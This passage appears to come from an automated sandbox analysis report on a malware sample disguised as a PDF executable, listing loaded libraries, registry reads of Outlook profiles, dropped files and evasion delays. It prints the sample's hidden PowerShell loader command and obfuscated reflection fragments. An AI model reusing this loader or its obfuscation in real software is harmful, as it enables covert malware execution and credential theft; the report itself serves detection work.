            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 678763_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %^qm.Core.pdb source: powershell.exe, 00000001.00000002.2154422416.00000000080F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdbL source: powershell.exe, 00000001.00000002.2154422416.00000000080F2000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2156462288.000000000A4F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((hardhacks $Srloves17 $Vermifuge), (Smedejernet @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Denethor = [AppDomain]::CurrentDomain.GetAssemblies()$global
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Betragtningers)), $Mineralize).DefineDynamicModule($Kallun, $false).DefineType($Glaikitness, $Reweaves, [System.MulticastDelegate])$Bi
            Source: C:\Users\user\Desktop\678763_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "
            Source: C:\Users\user\Desktop\678763_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_043029A1 push cs; retf 0007h1_2_043029A2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_043029C0 push cs; retf 0007h1_2_043029C2
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_3_0019CA98 pushfd ; retf 0019h6_3_0019CA99
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_3_0019EE18 push eax; iretd 6_3_0019EE65
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_3_0019EE8C push eax; iretd 6_3_0019EEA9
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_3_0019CF4C push eax; iretd 6_3_0019CF4D
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00159C30 push esp; retf 0017h6_2_00159D55
            Source: C:\Users\user\Desktop\678763_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeAPI/Special instruction interceptor: Address: 2D2630E
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeMemory allocated: 20BD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeMemory allocated: 20960000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599516Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599406Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598828Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598719Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598484Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598265Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598156Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598047Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597938Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597813Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597594Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596860Jump to behavior
